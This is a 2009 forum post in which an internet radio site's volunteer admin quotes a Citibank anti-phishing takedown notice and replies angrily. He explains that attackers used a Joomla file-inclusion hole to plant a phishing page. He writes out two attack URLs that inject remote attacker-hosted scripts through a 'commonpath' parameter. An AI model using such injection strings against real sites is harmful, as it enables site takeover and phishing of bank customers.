Script-Kiddies, CitiBank and other over the top bs.
This past weekend was yet another episode of script-kiddies playing games on the AM web site. However, with a twist... Jim received the following email which he forwarded to me:
Dear Sir or Madam:
Cyveillance, an anti-fraud and security company, is under contract to assist
Citibank and its related entities in preventing or terminating online
activity that targets Citibank's clients as potential fraud victims.. Cyveillance
has been made aware that you appear to be providing Internet Services to a
fraudulent Web site being used as part of a "phishing scam". This activity
violates Citibank copyright, trademark and other intellectual property rights
and may violate the criminal laws of the United States and other nations.
E-mail messages have been broadly distributed to individuals by a person or
entity pretending to be Citibank Bank. These e-mails use Citibank name and
identity (including trademarks) without authorization did not originate from
Citibank and this site is not an authorized Citibank site. The e-mails
request recipients to verify and submit sensitive details related to their
Citibank accounts. Within the fraudulent e-mail message, there is a link
that leads the recipients to a fraudulent website which is being hosted by
your company. The fraudulent website not only represents a misuse of
Citibank intellectual property; its purpose is designed to improperly obtain
personal information of Citibank customers in order to fraudulently access
their bank accounts. Contained in the email is an embedded URL:
IP Address: 22.214.171.124
We understand that you may not be aware of this improper use of your
services and we appreciate your cooperation. We specifically would ask that
you also take the following actions directly to Citibank:
Please take all necessary steps to immediately shut down the fraudulent
website, terminate its availability to the Internet and discontinue the
transmission of any e-mails associated with this website.
In the event that you do not comply with the above, Citibank and its related
entities reserve all rights to take any action now or at any point in the
PLEASE PROVIDE CITIBANK WITH THE FOLLOWING INFORMATION/DATA IF AVAILABLE:
- Content of the Phishing site and any available Logs (Access, FTP, Mail, and Web)
- Any customer data that has been captured and/or stored on your systems or equipment
- Any records you maintain that indicate the name, contact information,
method of payment or similar information that may be useful in helping learn
about the identity and location of the customer for whom the website has
Please send the above information to the following Citibank contacts:
Vishant Patel - email@example.com - (212) 657-2416
David Sun - firstname.lastname@example.org - (212) 657-3736
Tony Melone - email@example.com - (212) 657-4942
Thank you for your cooperation to prevent and terminate this fraudulent
Cyveillance Security Operations Center (CSOC)
Toll Free: +1 (866) 553-0646
Direct: +1 (703) 351-2400
Citi Security and Investigative Service
Name: John Pignataro
Address: 111 Wall St, 19th Floor/Zone 7, New York, 10005
======== ANALYST NOTES ========
It looks like a hacker has attached a fake bank page (a.k.a.
"phish") onto Aural Moon's Website. Please take a look and
do what you can to remove the bad files. Thank you in
advance for helping to protect our client and its customers
from bank fraud and identity theft. You may also want to
install any patches that would be needed to protect your
site in the future.
I will not be threatened or intimidated by assholes and told that I must take the web site down to protect their ass
ets. If people using on-line banking are STUPID enough to fall for the shit perpetrated by these script-kiddies, it is NOT my fault, Jim's or Aural Moon's. Albert Einstein once said, "Two things are infinite: the universe and human stupidity; and I'm not sure about the universe.
Over the top or not, my response is below:
To whom this may concern:
I was forwarded a message, the content of which is below, concerning the
Aural Moon web site and a "phishing" scam.
I want to first address the tone of this message. I find it very wrong,
unprofessional, accusatory and arrogant. Had Mr. Brennan not forwarded
it to me, I would have simply disregarded it. You should reprimand and
or fire the faineant dolt that composed this text as it's certainly NOT
worthy of my time to read, let alone address. If Cy-veillance has been
hired by CitiBank, their shareholders should be made aware of the lack
of Cy-veillance's fiduciary duty to address this issue with the proper
diligence it should have been afforded.
FWIW, I have been aware of the Aural Moon web site being exploited by a
script-kiddie or two in the past. Over the past few days, there has
been some further activity. However, I have not been able to address
this as I have been preoccupied over the past two months with the death
of a 95 year old grandmother, and the month long hospitalization and the
death (on Friday) of my mother-in-law. Yesterday, while I was attending
my grand daughter's christening and after party, this "shit hit the
fan". I did as much as I could at the party with my laptop and EVDO
internet connection. I finally had to cut my attendance at the party
short to head home to address this attack. I'm now wasting my time
addressing this email to you when I should be getting ready for the
viewing and the funeral of the mother-in-law.
Aural Moon is an internet radio station and web site. It is a hobby for
all those involved. It has been put together by a number of people that
were concerned in making a community and not as well focused on internet
security as they probably should have been. It's an internet radio site
and it was not considered to be all that interesting to the malevolence
of the internet no-good-nicks.
That said, I did find, after cleaning up quite the mess that the puerile
script-kiddies left (until well after 2am in the morning), interesting
clues as to the whys and wherefores of how the site was exploited. The
site is using Joomla as its CMS. The script-kitties used a hole in one
of the Joomla common files (which I have, now that I understand what and
how, closed) to execute their own scripts on OTHER servers. Here are 2
of the URLs that they used to execute/inject their code:
http: //www. auralmoon. com //playlist .php /db .php? commonpath=
http: //emmanuel. aubert. free. fr/ gunjibaba .txt???
http: //www. auralmoon. com //playlist .php /db .php? commonpath=
http: //offed. net /media /Shaun$ .txt?
I broke these URL apart so that you can read them. Since you morons are
in the banking business on Wall Street, I assume you are using crap like
Micro$oft WEENDOZE to read this email.
If these hapless Cy-veillance sots are worth the salt, they will check
out the text of the scripts at free.fr and offed.net and see what these
little pricks were up to.
One last thing, I have the emails, albeit they are disposable Yahoo
email addys, for you of these script-kiddies. Maybe Yahoo can lend you
a hand in tracking them down. Make certain to address Yahoo with the
very same adamant verbiage used in the email forwarded to me by Mr.
Brennan for the quickest resolution.
firstname.lastname@example.org and email@example.com
PS. For Cy-veillance... if you're going to use Whois technical contact
information to contact me, like you did with the myriad phone calls I
have logged this past weekend, you should leave a voice mail message! I
pay good money to have a voice mail service, so bloody fucking use it!
Watcher of the moon, watcher of all.
Mopper of the moon, mopper of all.
-- Aural Moon's Janitorial Services
and Restroom Supplies, and Techno-patsy --
Cogito ergo iMac.
Last edited by VAXman : 02-24-2009 at 05:40 AM.